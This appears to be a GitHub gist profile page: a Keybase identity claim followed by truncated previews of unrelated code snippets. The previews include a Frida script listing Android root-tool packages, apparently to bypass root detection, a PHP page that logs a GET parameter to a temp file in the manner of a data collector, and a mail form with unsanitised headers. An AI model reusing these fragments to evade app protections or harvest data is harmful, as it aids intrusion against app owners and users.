I hereby claim:
- I am nioupola on github.
- I am nlegall (https://keybase.io/nlegall) on keybase.
- I have a public key whose fingerprint is 8819 051A E2E4 028F D41E CC73 9161 9B7B 0141 9AEE
To claim this, I am signing this object:
| // Copyright 2021 Google LLC. | |
| // | |
| // Licensed under the Apache License, Version 2.0 (the "License"); | |
| // you may not use this file except in compliance with the License. | |
| // You may obtain a copy of the License at | |
| // | |
| // http://www.apache.org/licenses/LICENSE-2.0 | |
| // | |
| // Unless required by applicable law or agreed to in writing, software | |
| // distributed under the License is distributed on an "AS IS" BASIS, |
| diff --git a/Model/Indexer/Product/Price/AbstractAction.php b/Model/Indexer/Product/Price/AbstractAction.php | |
| index e69ab50..ce0c0f6 100644 | |
| --- a/Model/Indexer/Product/Price/AbstractAction.php | |
| +++ b/Model/Indexer/Product/Price/AbstractAction.php | |
| @@ -396,31 +396,39 @@ abstract class AbstractAction | |
| }, | |
| ARRAY_FILTER_USE_KEY | |
| ); | |
| - if (empty($typeIndexers)) { | |
| - $this->deleteIndexData($changedIds); |
I hereby claim:
To claim this, I am signing this object:
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", | |
| "com.koushikdutta.superuser", "com.thirdparty.superuser", "com.yellowes.su", "com.koushikdutta.rommanager", | |
| "com.koushikdutta.rommanager.license", "com.dimonvideo.luckypatcher", "com.chelpus.lackypatch", | |
| "com.ramdroid.appquarantine", "com.ramdroid.appquarantinepro", "com.devadvance.rootcloak", "com.devadvance.rootcloakplus", | |
| "de.robv.android.xposed.installer", "com.saurik.substrate", "com.zachspong.temprootremovejb", "com.amphoras.hidemyroot", | |
| "com.amphoras.hidemyrootadfree", "com.formyhm.hiderootPremium", "com.formyhm.hideroot", "me.phh.superuser", | |
| "eu.chainfire.supersu.pro", "com.kingouser.com", "com.topjohnwu.magisk" | |
| ]; |
| #!/bin/sh -e | |
| # | |
| # rc.local | |
| # | |
| # This script is executed at the end of each multiuser runlevel. | |
| # Make sure that the script will "" on success or any other | |
| # value on error. | |
| # | |
| # In order to enable or disable this script just change the execution | |
| # bits. |
| #!upstart | |
| description "Valetudo" | |
| env VALETUDO_CONFIG_PATH=/mnt/data/valetudo/valetudo_config.json | |
| start on started network-interface INTERFACE=wlan0 | |
| stop on runlevel [06] | |
| oom score 1000 | |
| exec /usr/local/bin/valetudo |
| <?php | |
| if(isset($_POST['name'])) { | |
| $name = $_POST['name']; | |
| $replyto = $_POST['replyTo']; | |
| $message = $_POST['message']; | |
| $to = 'zkw48824@zzrgg.com'; | |
| $subject = 'My Subject'; | |
| // Set SMTP headers | |
| $headers = "From: $name \n" . | |
| "Reply-To: $replyto"; |
| <?php | |
| $fp = fopen('/tmp/esd.txt', 'aw'); | |
| fwrite($fp, $_GET["u"]."\n"); | |
| fclose($fp); | |
| ?> | |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="utf-8" /> | |
| <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css" integrity="sha256-2YQRJMXD7pIAPHiXr0s+vlRWA7GYJEK0ARns7k2sbHY=" crossorigin="anonymous" /> |
| from sys import argv | |
| message = argv[1] | |
| LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
| letters = 'abcdefghijklmnopqrstuvwxyz' | |
| for key in range(26): | |
| translated = '' | |
| for letter in message: | |
| if letter.isupper(): |
| #!/bin/sh | |
| # ============================================================================= | |
| # Author: Chu-Siang Lai / chusiang (at) drx.tw | |
| # Filename: teams-chat-post.sh | |
| # Modified: 2018-03-28 15:04 | |
| # Description: Post a message to Microsoft Teams. | |
| # Reference: | |
| # | |
| # - https://gist.github.com/chusiang/895f6406fbf9285c58ad0a3ace13d025 | |
| # |